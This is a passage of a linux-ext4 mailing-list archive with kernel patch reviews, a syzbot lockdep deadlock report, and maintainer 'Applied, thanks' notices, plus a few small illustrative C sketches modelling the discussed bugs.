+            (!folio_uptodate || block_start < to);
             block++, block_start = block_end, bh = bh->b_this_page) {
                ...
        }

So the prefix path and all in-range handling stay unchanged.  The only
skipped work is the tail part after @to, and only for a folio that was
already uptodate before write_begin() started.
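
To make the effect of the extra loop condition concrete, here is a small
userspace model of the walk.  It is only a sketch: struct bh_model,
link_ring() and count_visited() are hypothetical stand-ins, and the real
loop body (mapping, zeroing, reads) is reduced to a counter.

```c
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical stand-in for struct buffer_head: only the ring link. */
struct bh_model {
	struct bh_model *b_this_page;
};

/* Chain bhs[0..nr-1] into a ring, like a folio's buffer_heads. */
static void link_ring(struct bh_model *bhs, size_t nr)
{
	for (size_t i = 0; i < nr; i++)
		bhs[i].b_this_page = &bhs[(i + 1) % nr];
}

/*
 * Count the buffers visited by the proposed loop condition.
 * blocksize:      bytes per buffer
 * to:             end offset of the write within the folio
 * folio_uptodate: folio state sampled before the walk starts
 */
static size_t count_visited(struct bh_model *head, size_t blocksize,
			    size_t to, bool folio_uptodate)
{
	struct bh_model *bh;
	size_t block_start, block_end, visited = 0;

	for (bh = head, block_start = 0;
	     (bh != head || !block_start) &&
	     (!folio_uptodate || block_start < to);
	     block_start = block_end, bh = bh->b_this_page) {
		block_end = block_start + blocksize;
		visited++;	/* the real per-buffer work would go here */
	}
	return visited;
}
```

With a 64K folio of sixteen 4K buffers and a 1K overwrite at offset 0,
the model visits one buffer when the folio is already uptodate and all
sixteen when it is not.  The prefix buffers before @from are still
walked in both cases.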

> ... converting ext4 to use iomap instead of buffer heads.

I strongly agree that iomap is the right direction for ext4.  The iomap
buffered write path would make this particular buffer-head walk cost go
away.

The reason I am still looking at this path is that the regression is
visible in our LTS upgrade testing from 6.12 to 6.18.  It was introduced
by the ext4 large-folio enablement in v6.16.  For example, in our
libMicro release benchmark with THP always enabled, usecs/call, lower is
better:

case        v6.12        v6.18        regression
write_u1k   0.609        4.659        +665.0%
write_u10k  1.408        4.869        +245.8%

The iomap conversion is the long-term fix, but it does not help kernels
which still use the buffer-head buffered write path.  I would like to keep
this as a small regression fix for that path, and make it minimal enough
to be suitable for stable/LTS backport.

Would this v2 direction look OK to you?

* Re: [PATCH 10/17] jbd2: replace __get_free_pages() with kmalloc()
From: David Laight @ 2026-06-05  8:33 UTC (permalink / raw)
  To: Theodore Tso
  Cc: Mike Rapoport, Jan Kara, Mark Fasheh, Joel Becker, Joseph Qi,
	Ryusuke Konishi, Viacheslav Dubeyko, Trond Myklebust,
	Anna Schumaker, Chuck Lever, Jeff Layton, NeilBrown,
	Olga Kornievskaia, Dai Ngo, Tom Talpey, Alexander Viro,
	Christian Brauner, Jan Kara, Dave Kleikamp, Miklos Szeredi,
	Andreas Hindborg, Breno Leitao, Kees Cook, Tigran A. Aivazian,
	linux-kernel, linux-fsdevel, ocfs2-devel, linux-nilfs, linux-nfs,
	jfs-discussion, linux-ext4, linux-mm
In-Reply-To: <ximvn6jwgtam665a4droqkp73o55kwvd5uukyidwjesmysobth@oe7rigpsjfkz>

On Thu, 4 Jun 2026 10:05:52 -0400
"Theodore Tso" <tytso@mit.edu> wrote:

...
> I suppose we could do it with kmalloc() with some flags to
> prevent forced reclaim / compaction, and if that fails, then fall back
> to vmalloc().  Is there a better way?

There is already kvalloc().
I'm not sure how hard that tries to get kmalloc() to succeed.

-- David

> 
> Thanks,
> 
> 					- Ted
> 


* Re: [PATCH RFC 10/17] ext4: use fast incremental CRC update in ext4_free_inode()
From: Baokun Li @ 2026-06-05  7:55 UTC (permalink / raw)
  To: Theodore Tso; +Cc: linux-ext4, sashiko
In-Reply-To: <h3n7jlfhyna64dn5o76qxcspnhxdddcs6crpxftmy7gnl7b3sx@jenszfpcsnit>

On 2026/6/3 22:17, Theodore Tso wrote:
> On Fri, May 08, 2026 at 11:33:05PM +0000, sashiko-bot@kernel.org wrote:
>> Thank you for your contribution! Sashiko AI review found 1 potential issue(s) to consider:
>> - [High] ext4_inode_bitmap_csum_set_fast() corrupts the inode bitmap checksum if EXT4_INODES_PER_GROUP(sb) is not a multiple of 8.
>>
>>> -	ext4_inode_bitmap_csum_set(sb, gdp, bitmap_bh);
>>> +	ext4_inode_bitmap_csum_set_fast(sb, gdp, bit);
>> Can this corrupt the inode bitmap checksum if EXT4_INODES_PER_GROUP(sb) is not
>> a multiple of 8?
>>
>> In ext4_inode_bitmap_csum_set(), the CRC32c checksum is computed over exactly
>> EXT4_INODES_PER_GROUP(sb) >> 3 bytes. If s_inodes_per_group is not a multiple
>> of 8, any trailing fractional bits are strictly excluded from the checksum
>> calculation.
>>
>> Because ext4_fill_super() does not enforce that s_inodes_per_group is a
>> multiple of 8, a crafted filesystem can have an unaligned s_inodes_per_group.
> The reason why ext4_fill_super() doesn't enforce that
> s_inodes_per_group is a multiple of 8 was that a long time ago, back
> when Android was allergic to GPLv2 in userspace, they implemented
> their own version of mke2fs (and didn't run fsck on the file system,
> sigh).  Their MIT licensed version of make_ext4fs would occasionally
> make file systems where that value was not a multiple of 8, and this ran afoul of
> e2fsck[1] if someone actually tried to repair a corrupted Android user
> data file system (as opposed to just wiping the flash and starting
> from scratch).
>
> [1] https://sourceforge.net/p/e2fsprogs/bugs/292/
>
> This was fixed long ago (over a decade ago), and so at this point, I'm
> pretty sure any such mobile handsets are in the landfill, so we
> probably should fix this by adding a check in ext4_fill_super() and a
> corresponding check in e2fsck.
>
> 					- Ted

Hi Ted,

Thank you for the background and the suggestion.

I will send two fix patches to bring the checks in ext4_fill_super()
and e2fsck in sync with mke2fs.
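
For clarity, the arithmetic behind the reported issue can be sketched as
below.  This is a standalone illustration, not the planned patch: the
helper names are hypothetical, and only the ">> 3" byte count comes from
the review text quoted above.

```c
#include <stdbool.h>
#include <stdint.h>

/* Bytes covered by the inode bitmap checksum: inodes_per_group >> 3. */
static uint32_t csum_bytes(uint32_t inodes_per_group)
{
	return inodes_per_group >> 3;
}

/* Trailing bitmap bits that fall outside the checksummed bytes. */
static uint32_t uncovered_bits(uint32_t inodes_per_group)
{
	return inodes_per_group & 7;
}

/*
 * Hypothetical validation helper: true when every bitmap bit is
 * covered by the checksum, i.e. the value is a multiple of 8.
 */
static bool inodes_per_group_aligned(uint32_t inodes_per_group)
{
	return uncovered_bits(inodes_per_group) == 0;
}
```

For example, with 8190 inodes per group the checksum covers 1023 bytes
and leaves 6 bits uncovered, so an incremental update that touches one
of those bits would change a checksum that the full recomputation never
included them in.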


Thanks,
Baokun


* Re: [PATCH v2] common/defrag: skip defrag tests on DAX-enabled filesystems
From: Disha Goel @ 2026-06-05  7:02 UTC (permalink / raw)
  To: Darrick J. Wong
  Cc: fstests, linux-ext4, linux-fsdevel, linux-xfs, ritesh.list,
	ojaswin
In-Reply-To: <20260604145434.GG6095@frogsfrogsfrogs>

On 04/06/26 8:24 pm, Darrick J. Wong wrote:
> On Thu, Jun 04, 2026 at 05:53:05PM +0530, Disha Goel wrote:
>> Online defragmentation is not supported on ext4 DAX-enabled filesystems.
>> The ext4 defrag ioctl (EXT4_IOC_MOVE_EXT) returns EOPNOTSUPP when used
>> on DAX files.
>>
>> Add an ext4-specific check in _require_defrag() to skip tests when DAX
>> is enabled, avoiding false failures on ext4/301-304, ext4/308, and
>> generic/018.
>>
>> XFS defrag works with DAX, so this check is ext4-specific.
>>
>> Signed-off-by: Disha Goel <disgoel@linux.ibm.com>
>> Reviewed-by: Ojaswin Mujoo <ojaswin@linux.ibm.com>
>> ---
>> Changes in v2:
>> - Made the check ext4-specific as XFS defrag works with DAX
>>    (feedback from Darrick)
>> - Use __scratch_uses_fsdax() instead of grepping MOUNT_OPTIONS
>> - Removed unnecessary comment as _notrun message is self-explanatory
>>
>>   common/defrag | 4 ++++
>>   1 file changed, 4 insertions(+)
>>
>> diff --git a/common/defrag b/common/defrag
>> index 055d0d0e..f17271cd 100644
>> --- a/common/defrag
>> +++ b/common/defrag
>> @@ -6,6 +6,10 @@
>>   
>>   _require_defrag()
>>   {
>> +    if [ "$FSTYP" = "ext4" ] && __scratch_uses_fsdax; then
> 
> Shouldn't this be:
> 
> 	ext4)
> 		__scratch_uses_fsdax && _notrun "..."
> 		;;
> 
> in the case statement below?
> 
> --D

Yes, that makes more sense. Keeping the ext4-specific check inside the
ext4 case is cleaner and more consistent with the existing structure.

I'll send v3 with this change.

> 
>> +        _notrun "ext4 online defrag not supported with DAX"
>> +    fi
>> +
>>       case "$FSTYP" in
>>       xfs)
>>           # xfs_fsr does preallocates, require "falloc"
>> -- 
>> 2.45.1
>>

-- 
Regards,
Disha


* [syzbot] [overlayfs?] [ext4?] possible deadlock in lock_two_nondirectories (2)
From: syzbot @ 2026-06-04 21:33 UTC (permalink / raw)
  To: amir73il, linux-ext4, linux-kernel, linux-unionfs, miklos,
	syzkaller-bugs

Hello,

syzbot found the following issue on:

HEAD commit:    ba3e43a9e601 Merge tag 'soc-fixes-7.1-2' of git://git.kern..
git tree:       upstream
console output: https://syzkaller.appspot.com/x/log.txt?x=1033aa56580000
kernel config:  https://syzkaller.appspot.com/x/.config?x=bd38685893011045
dashboard link: https://syzkaller.appspot.com/bug?extid=ad6118a7584b607c67f2
compiler:       Debian clang version 21.1.8 (++20251221033036+2078da43e25a-1~exp1~20251221153213.50), Debian LLD 21.1.8
syz repro:      https://syzkaller.appspot.com/x/repro.syz?x=17e2f3ec580000
C reproducer:   https://syzkaller.appspot.com/x/repro.c?x=174c2a66580000

Downloadable assets:
disk image: https://storage.googleapis.com/syzbot-assets/8759ddf1bfa7/disk-ba3e43a9.raw.xz
vmlinux: https://storage.googleapis.com/syzbot-assets/e2f0e563c705/vmlinux-ba3e43a9.xz
kernel image: https://storage.googleapis.com/syzbot-assets/b40bdb37a0d7/bzImage-ba3e43a9.xz
mounted in repro: https://storage.googleapis.com/syzbot-assets/4074e1f6d9f8/mount_0.gz
  fsck result: failed (log: https://syzkaller.appspot.com/x/fsck.log?x=1103db7e580000)

IMPORTANT: if you fix the issue, please add the following tag to the commit:
Reported-by: syzbot+ad6118a7584b607c67f2@syzkaller.appspotmail.com

EXT4-fs: Ignoring removed bh option
EXT4-fs (loop0): stripe (5) is not aligned with cluster size (16), stripe is disabled
EXT4-fs (loop0): mounted filesystem 00000000-0000-0000-0000-000000000000 r/w without journal. Quota mode: none.
======================================================
WARNING: possible circular locking dependency detected
syzkaller #0 Not tainted
------------------------------------------------------
syz.0.22/5968 is trying to acquire lock:
ffff88805aab44a0 (&ovl_i_mutex_key[depth]){+.+.}-{4:4}, at: inode_lock include/linux/fs.h:1029 [inline]
ffff88805aab44a0 (&ovl_i_mutex_key[depth]){+.+.}-{4:4}, at: lock_two_nondirectories+0xe7/0x180 fs/inode.c:1254

but task is already holding lock:
ffff88803ea9c480 (sb_writers#4){.+.+}-{0:0}, at: mnt_want_write_file+0x63/0x210 fs/namespace.c:537

which lock already depends on the new lock.


the existing dependency chain (in reverse order) is:

-> #1 (sb_writers#4){.+.+}-{0:0}:
       percpu_down_read_internal include/linux/percpu-rwsem.h:53 [inline]
       percpu_down_read_freezable include/linux/percpu-rwsem.h:83 [inline]
       __sb_start_write include/linux/fs/super.h:19 [inline]
       sb_start_write+0x4d/0x1c0 include/linux/fs/super.h:125
       file_start_write include/linux/fs.h:2724 [inline]
       vfs_iter_write+0x1f8/0x610 fs/read_write.c:982
       do_backing_file_write_iter fs/backing-file.c:226 [inline]
       backing_file_write_iter+0x5e7/0x950 fs/backing-file.c:274
       ovl_write_iter+0x2fd/0x3d0 fs/overlayfs/file.c:370
       new_sync_write fs/read_write.c:595 [inline]
       vfs_write+0x629/0xba0 fs/read_write.c:688
       ksys_pwrite64 fs/read_write.c:795 [inline]
       __do_sys_pwrite64 fs/read_write.c:803 [inline]
       __se_sys_pwrite64 fs/read_write.c:800 [inline]
       __x64_sys_pwrite64+0x19c/0x230 fs/read_write.c:800
       do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
       do_syscall_64+0x174/0x580 arch/x86/entry/syscall_64.c:94
       entry_SYSCALL_64_after_hwframe+0x77/0x7f

-> #0 (&ovl_i_mutex_key[depth]){+.+.}-{4:4}:
       check_prev_add kernel/locking/lockdep.c:3165 [inline]
       check_prevs_add kernel/locking/lockdep.c:3284 [inline]
       validate_chain kernel/locking/lockdep.c:3908 [inline]
       __lock_acquire+0x15a5/0x2cf0 kernel/locking/lockdep.c:5237
       lock_acquire+0x106/0x350 kernel/locking/lockdep.c:5868
       down_write+0x3a/0x50 kernel/locking/rwsem.c:1625
       inode_lock include/linux/fs.h:1029 [inline]
       lock_two_nondirectories+0xe7/0x180 fs/inode.c:1254
       ext4_move_extents+0x20f/0x3950 fs/ext4/move_extent.c:589
       __ext4_ioctl fs/ext4/ioctl.c:1657 [inline]
       ext4_ioctl+0x3092/0x4b40 fs/ext4/ioctl.c:1922
       vfs_ioctl fs/ioctl.c:51 [inline]
       __do_sys_ioctl fs/ioctl.c:597 [inline]
       __se_sys_ioctl+0xff/0x170 fs/ioctl.c:583
       do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
       do_syscall_64+0x174/0x580 arch/x86/entry/syscall_64.c:94
       entry_SYSCALL_64_after_hwframe+0x77/0x7f

other info that might help us debug this:

 Possible unsafe locking scenario:

       CPU0                    CPU1
       ----                    ----
  rlock(sb_writers#4);
                               lock(&ovl_i_mutex_key[depth]);
                               lock(sb_writers#4);
  lock(&ovl_i_mutex_key[depth]);

 *** DEADLOCK ***

1 lock held by syz.0.22/5968:
 #0: ffff88803ea9c480 (sb_writers#4){.+.+}-{0:0}, at: mnt_want_write_file+0x63/0x210 fs/namespace.c:537

stack backtrace:
CPU: 0 UID: 0 PID: 5968 Comm: syz.0.22 Not tainted syzkaller #0 PREEMPT_{RT,(full)} 
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 04/18/2026
Call Trace:
 <TASK>
 dump_stack_lvl+0xe8/0x150 lib/dump_stack.c:120
 print_circular_bug+0x2e1/0x300 kernel/locking/lockdep.c:2043
 check_noncircular+0x12e/0x150 kernel/locking/lockdep.c:2175
 check_prev_add kernel/locking/lockdep.c:3165 [inline]
 check_prevs_add kernel/locking/lockdep.c:3284 [inline]
 validate_chain kernel/locking/lockdep.c:3908 [inline]
 __lock_acquire+0x15a5/0x2cf0 kernel/locking/lockdep.c:5237
 lock_acquire+0x106/0x350 kernel/locking/lockdep.c:5868
 down_write+0x3a/0x50 kernel/locking/rwsem.c:1625
 inode_lock include/linux/fs.h:1029 [inline]
 lock_two_nondirectories+0xe7/0x180 fs/inode.c:1254
 ext4_move_extents+0x20f/0x3950 fs/ext4/move_extent.c:589
 __ext4_ioctl fs/ext4/ioctl.c:1657 [inline]
 ext4_ioctl+0x3092/0x4b40 fs/ext4/ioctl.c:1922
 vfs_ioctl fs/ioctl.c:51 [inline]
 __do_sys_ioctl fs/ioctl.c:597 [inline]
 __se_sys_ioctl+0xff/0x170 fs/ioctl.c:583
 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
 do_syscall_64+0x174/0x580 arch/x86/entry/syscall_64.c:94
 entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7fb592a3ce59
Code: ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 e8 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007ffc3443e838 EFLAGS: 00000246 ORIG_RAX: 0000000000000010
RAX: ffffffffffffffda RBX: 00007fb592cb5fa0 RCX: 00007fb592a3ce59
RDX: 0000200000000040 RSI: 00000000c028660f RDI: 0000000000000005
RBP: 00007fb592ad2d6f R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000
R13: 00007fb592cb5fac R14: 00007fb592cb5fa0 R15: 00007fb592cb5fa0
 </TASK>


---
This report is generated by a bot. It may contain errors.
See https://goo.gl/tpsmEJ for more information about syzbot.
syzbot engineers can be reached at syzkaller@googlegroups.com.

syzbot will keep track of this issue. See:
https://goo.gl/tpsmEJ#status for how to communicate with syzbot.

If the report is already addressed, let syzbot know by replying with:
#syz fix: exact-commit-title

If you want syzbot to run the reproducer, reply with:
#syz test: git://repo/address.git branch-or-commit-hash
If you attach or paste a git patch, syzbot will apply it before testing.

If you want to overwrite report's subsystems, reply with:
#syz set subsystems: new-subsystem
(See the list of subsystem names on the web dashboard)

If the report is a duplicate of another one, reply with:
#syz dup: exact-subject-of-another-report

If you want to undo deduplication, reply with:
#syz undup


* Re: [PATCH v2] common/defrag: skip defrag tests on DAX-enabled filesystems
From: Darrick J. Wong @ 2026-06-04 14:54 UTC (permalink / raw)
  To: Disha Goel
  Cc: fstests, linux-ext4, linux-fsdevel, linux-xfs, ritesh.list,
	ojaswin
In-Reply-To: <20260604122305.39805-1-disgoel@linux.ibm.com>

On Thu, Jun 04, 2026 at 05:53:05PM +0530, Disha Goel wrote:
> Online defragmentation is not supported on ext4 DAX-enabled filesystems.
> The ext4 defrag ioctl (EXT4_IOC_MOVE_EXT) returns EOPNOTSUPP when used
> on DAX files.
> 
> Add an ext4-specific check in _require_defrag() to skip tests when DAX
> is enabled, avoiding false failures on ext4/301-304, ext4/308, and
> generic/018.
> 
> XFS defrag works with DAX, so this check is ext4-specific.
> 
> Signed-off-by: Disha Goel <disgoel@linux.ibm.com>
> Reviewed-by: Ojaswin Mujoo <ojaswin@linux.ibm.com>
> ---
> Changes in v2:
> - Made the check ext4-specific as XFS defrag works with DAX
>   (feedback from Darrick)
> - Use __scratch_uses_fsdax() instead of grepping MOUNT_OPTIONS
> - Removed unnecessary comment as _notrun message is self-explanatory
> 
>  common/defrag | 4 ++++
>  1 file changed, 4 insertions(+)
> 
> diff --git a/common/defrag b/common/defrag
> index 055d0d0e..f17271cd 100644
> --- a/common/defrag
> +++ b/common/defrag
> @@ -6,6 +6,10 @@
>  
>  _require_defrag()
>  {
> +    if [ "$FSTYP" = "ext4" ] && __scratch_uses_fsdax; then

Shouldn't this be:

	ext4)
		__scratch_uses_fsdax && _notrun "..."
		;;

in the case statement below?

--D

> +        _notrun "ext4 online defrag not supported with DAX"
> +    fi
> +
>      case "$FSTYP" in
>      xfs)
>          # xfs_fsr does preallocates, require "falloc"
> -- 
> 2.45.1
> 


* Re: [RFC v8 0/7] ext4: fast commit: snapshot inode state for FC log
From: Theodore Ts'o @ 2026-06-04 14:45 UTC (permalink / raw)
  To: Zhang Yi, Andreas Dilger, Li Chen
  Cc: Theodore Ts'o, Steven Rostedt, Masami Hiramatsu,
	Mathieu Desnoyers, linux-ext4, linux-trace-kernel, linux-kernel
In-Reply-To: <20260515091829.194810-1-me@linux.beauty>


On Fri, 15 May 2026 17:18:20 +0800, Li Chen wrote:
> (This RFC v8 series is rebased onto linux-next master as of 2026-05-09,
> commit e98d21c170b0 ("Add linux-next specific files for 20260508"), and
> depends on patch "ext4: fix fast commit wait/wake bit mapping on
> 64-bit" [0]).
> 
> Zhang Yi in RFC v3 review pointed out that postponing lockdep assertions only
> masks the issue, and that sleeping in ext4_fc_track_inode() while holding
> i_data_sem can form a real ABBA deadlock if the fast commit writer also needs
> i_data_sem while the inode is in FC_COMMITTING.
> 
> [...]

Applied, thanks!

[1/7] ext4: fast commit: snapshot inode state before writing log
      commit: e9c6e0b8e096255feb71ec996c77bdfbe9c36e91
[2/7] ext4: lockdep: handle i_data_sem subclassing for special inodes
      commit: 7f473f971382d73a58e386afa7efdaac294b89f0
[3/7] ext4: fast commit: avoid waiting for FC_COMMITTING
      commit: b3060e96533dc3157fc6d3d45dc19927c566977b
[4/7] ext4: fast commit: avoid self-deadlock in inode snapshotting
      commit: 2b9b216628fd9352f9c791701c8990d05736aa90
[5/7] ext4: fast commit: avoid i_data_sem by dropping ext4_map_blocks() in snapshots
      commit: 22d887e06a57261df58404c8dce50c4ef37549ed
[6/7] ext4: fast commit: add lock_updates tracepoint
      commit: d2f6e83bbbef31169ea363af4277f5c09c914eda
[7/7] ext4: fast commit: export snapshot stats in fc_info
      commit: 56bb0b64f4b198bad5ce674509c10793d471148f

Best regards,
-- 
Theodore Ts'o <tytso@mit.edu>


* Re: [PATCH] ext4: fix LOGFLUSH shutdown ordering to allow ordered-mode data writeback
From: Theodore Ts'o @ 2026-06-04 14:45 UTC (permalink / raw)
  To: linux-ext4, Zhang Yi
  Cc: Theodore Ts'o, linux-fsdevel, linux-kernel, adilger.kernel,
	libaokun, jack, ojaswin, ritesh.list, yi.zhang, yizhang089,
	yangerkun, yukuai
In-Reply-To: <20260424104201.1930823-1-yi.zhang@huaweicloud.com>


On Fri, 24 Apr 2026 18:42:01 +0800, Zhang Yi wrote:
> In EXT4_GOING_FLAGS_LOGFLUSH mode, the EXT4_FLAGS_SHUTDOWN flag was set
> before calling ext4_force_commit().  This caused ordered-mode data
> writeback (triggered by journal commit) to fail with -EIO, since
> ext4_do_writepages() checks for the shutdown flag.  The journal would
> then be aborted prematurely before the commit could succeed.
> 
> Fix this by calling ext4_force_commit() first, then setting the
> shutdown flag, so that pending data can be written back correctly.
> 
> [...]

Applied, thanks!

[1/1] ext4: fix LOGFLUSH shutdown ordering to allow ordered-mode data writeback
      commit: d99748ef1695ce17eaf51c64b7a06952fa7cddab

Best regards,
-- 
Theodore Ts'o <tytso@mit.edu>
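
A toy userspace model of the ordering problem described in the quoted
commit message, offered as a sketch and not as the kernel code.  All
names here (toy_fs, toy_writepages, toy_force_commit, ...) are
hypothetical stand-ins.  The only behaviour taken from the thread is
that writeback fails with -EIO once the shutdown flag is set, and that
the fix commits first and sets the flag afterwards.

```c
#include <errno.h>
#include <stdbool.h>

/* Hypothetical, heavily simplified filesystem state. */
struct toy_fs {
	bool shutdown;		/* stands in for EXT4_FLAGS_SHUTDOWN */
	bool journal_aborted;
	int dirty_pages;	/* ordered-mode data still to be written */
};

/* Writeback refuses to run once the shutdown flag is set. */
static int toy_writepages(struct toy_fs *fs)
{
	if (fs->shutdown)
		return -EIO;
	fs->dirty_pages = 0;
	return 0;
}

/* A commit in ordered mode writes back data first; failure aborts. */
static int toy_force_commit(struct toy_fs *fs)
{
	int ret = toy_writepages(fs);

	if (ret < 0)
		fs->journal_aborted = true;
	return ret;
}

/* Old ordering: flag first, so the commit's writeback fails. */
static int toy_shutdown_flag_first(struct toy_fs *fs)
{
	fs->shutdown = true;
	return toy_force_commit(fs);
}

/* Fixed ordering: commit first, then set the flag. */
static int toy_shutdown_commit_first(struct toy_fs *fs)
{
	int ret = toy_force_commit(fs);

	fs->shutdown = true;
	return ret;
}
```

In this model the flag-first variant leaves dirty_pages untouched and
marks the journal aborted, while the commit-first variant writes the
data back before the flag takes effect.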


* Re: [PATCH 10/17] jbd2: replace __get_free_pages() with kmalloc()
From: Matthew Wilcox @ 2026-06-04 14:46 UTC (permalink / raw)
  To: Theodore Tso
  Cc: Mike Rapoport, Jan Kara, Mark Fasheh, Joel Becker, Joseph Qi,
	Ryusuke Konishi, Viacheslav Dubeyko, Trond Myklebust,
	Anna Schumaker, Chuck Lever, Jeff Layton, NeilBrown,
	Olga Kornievskaia, Dai Ngo, Tom Talpey, Alexander Viro,
	Christian Brauner, Jan Kara, Dave Kleikamp, Miklos Szeredi,
	Andreas Hindborg, Breno Leitao, Kees Cook, Tigran A. Aivazian,
	linux-kernel, linux-fsdevel, ocfs2-devel, linux-nilfs, linux-nfs,
	jfs-discussion, linux-ext4, linux-mm
In-Reply-To: <ximvn6jwgtam665a4droqkp73o55kwvd5uukyidwjesmysobth@oe7rigpsjfkz>

I'm hoping you'll take my "Remove special jbd2 slabs" patch instead of
this one, but answering here anyway ...

On Thu, Jun 04, 2026 at 10:05:52AM -0400, Theodore Tso wrote:
> On Thu, Jun 04, 2026 at 09:14:57AM +0300, Mike Rapoport wrote:
> > There's no memory overhead when order == 1.
> > As for the CPU overhead, the difference for the fast path allocations is
> > not measurable and for the slow path it is anyway determined by the amount
> > of reclaim involved rather than by what allocator is used.
> 
> Thanks for confirming!
> 
> > Larger allocations (> PAGE_SIZE * 2) go straight to the page allocator.

That is a detail subject to change.  I have some ideas ...

What users are guaranteed is that kmalloc returns physically contiguous
memory, and that a power-of-two-sized allocation is naturally aligned.

> Another question: Today, we can either use kmalloc() (or
> __get_free_pages, previously) or vmalloc().  Is there a way a file
> system can say, "give me physically contiguous pages if possible, but
> if it's too hard --- with some TBD to specify what 'too hard' means or
> can be specified --- fall back to a vmalloc-style approach, with the
> page table / TLB overhead that this might imply"?
> 
> I suppose we could do it with kmalloc() with some flags to
> prevent forced reclaim / compaction, and if that fails, then fall back
> to vmalloc().  Is there a better way?

I think we'd like to avoid doing that.  A lot of code has various
workarounds for deficiencies in the memory allocator (some of which have
been fixed and thus the workarounds only complicate matters).  If the
memory allocator(s) aren't providing what you need (be it performance
under load, fragmentation avoidance or whatever), it's best to get that
fixed rather than having fallback paths.

There have been people who have suggested "What if folios could be
physically discontiguous", and sometimes I've humoured them, but the
simplifications enabled by requiring folios to be contiguous are quite
immense.

We've been trying to move in the direction of exposing more high-level
APIs so people can say "I want to allocate 10MB of memory but it doesn't
need to be contiguous" and have the allocator either fail the whole
thing up front or make efforts to ensure that you get the whole 10MB.
It's a lot more efficient than calling get_free_page() 2500 times
and possibly having reclaim run a dozen different times.

(anyone else try to create a brd that's actually larger than system ram?
;-)


* Re: [PATCH v6 0/2] ext4: add hash Kunit tests and optimize str2hashbuf
From: Theodore Ts'o @ 2026-06-04 14:45 UTC (permalink / raw)
  To: Andreas Dilger, Baokun Li, Jan Kara, Ojaswin Mujoo,
	Ritesh Harjani, Zhang Yi, Guan-Chun Wu
  Cc: Theodore Ts'o, linux-ext4, linux-kernel, edward062254,
	visitorckw, david.laight.linux
In-Reply-To: <20260531080019.3794809-1-409411716@gms.tku.edu.tw>


On Sun, 31 May 2026 16:00:17 +0800, Guan-Chun Wu wrote:
> This series adds Kunit tests for fs/ext4/hash.c and refactors
> the str2hashbuf_{signed,unsigned}() helpers.
> 
> Patch 1 adds test coverage for ext4fs_dirhash(), including the main
> hash variants and relevant edge cases.
> 
> Patch 2 simplifies the str2hashbuf helper implementation by processing
> input in 4-byte chunks and removing function-pointer dispatch. This also
> reduces overhead and shows roughly 2x improvement on longer inputs in
> local testing.
> 
> [...]

Applied, thanks!

[1/2] ext4: add Kunit coverage for directory hash computation
      commit: 3147cac6c1929f26b4687993b8c7af5b7b34496d
[2/2] ext4: improve str2hashbuf by processing 4-byte chunks and removing function pointers
      commit: 3ca1d19c1971ac4f25478eafb741e726bf2d5954

Best regards,
-- 
Theodore Ts'o <tytso@mit.edu>


* Re: [PATCH] ext4: fix fast commit wait/wake bit mapping on 64-bit
From: Theodore Ts'o @ 2026-06-04 14:45 UTC (permalink / raw)
  To: Li Chen
  Cc: Theodore Ts'o, Andreas Dilger, Baokun Li, Jan Kara,
	Ojaswin Mujoo, Ritesh Harjani, Zhang Yi, linux-ext4, linux-kernel,
	Sashiko AI review
In-Reply-To: <20260513085818.552432-1-me@linux.beauty>


On Wed, 13 May 2026 16:58:17 +0800, Li Chen wrote:
> On 64-bit, ext4 dynamic inode states live in the upper half of i_flags,
> and ext4_test_inode_state() applies the corresponding +32 offset.
> 
> The fast-commit wait and wake paths open-coded the wait key with the raw
> EXT4_STATE_* value. Add small helpers for the state wait word and bit,
> and use them for the FC_COMMITTING and FC_FLUSHING_DATA waits so the wait
> key follows the same mapping as the state helpers.
> 
> [...]

Applied, thanks!

[1/1] ext4: fix fast commit wait/wake bit mapping on 64-bit
      commit: 8b3bc93fee6771775243665a0cf31857d6659775

Best regards,
-- 
Theodore Ts'o <tytso@mit.edu>
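
A minimal userspace sketch of the bit-mapping mismatch described in the
quoted commit message.  The helper names (toy_state_bit, toy_set_state,
toy_test_state, toy_test_raw) are hypothetical and are not the helpers
the patch adds.  The sketch assumes only what the message states: on
64-bit the dynamic state bits sit 32 bits above the raw state number.
On a 32-bit build the sketch simply uses offset 0.

```c
#include <limits.h>
#include <stdbool.h>

#define TOY_BITS_PER_LONG (sizeof(unsigned long) * CHAR_BIT)

/* Map a raw state number to the bit actually used in the flags word. */
static unsigned int toy_state_bit(unsigned int state)
{
	return TOY_BITS_PER_LONG == 64 ? state + 32 : state;
}

/* Set a state through the mapping, as the state helpers do. */
static void toy_set_state(unsigned long *flags, unsigned int state)
{
	*flags |= 1UL << toy_state_bit(state);
}

/* Test a state through the same mapping. */
static bool toy_test_state(unsigned long flags, unsigned int state)
{
	return (flags & (1UL << toy_state_bit(state))) != 0;
}

/* Open-coded test with the raw state number: wrong bit on 64-bit. */
static bool toy_test_raw(unsigned long flags, unsigned int state)
{
	return (flags & (1UL << state)) != 0;
}
```

Anything that identifies the bit by its raw number, as the open-coded
wait key did, refers to a different bit than the one the state helpers
set and clear on 64-bit; routing both sides through one mapping
function removes that disagreement.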


* Re: [PATCH v2] jbd2: fix integer underflow in jbd2_journal_initialize_fast_commit()
From: Theodore Ts'o @ 2026-06-04 14:45 UTC (permalink / raw)
  To: Jan Kara, Harshad Shirwadkar, Junrui Luo
  Cc: Theodore Ts'o, linux-ext4, linux-kernel, Yuhao Jiang, stable
In-Reply-To: <SYBPR01MB7881663C927DE9D7BBF4D1DFAF062@SYBPR01MB7881.ausprd01.prod.outlook.com>


On Wed, 13 May 2026 17:28:40 +0800, Junrui Luo wrote:
> jbd2_journal_initialize_fast_commit() validates journal capacity by
> checking (journal->j_last - num_fc_blks < JBD2_MIN_JOURNAL_BLOCKS).
> Both j_last and num_fc_blks are unsigned, so when num_fc_blks exceeds
> j_last the subtraction wraps to a large value, bypassing the bounds
> check.
> 
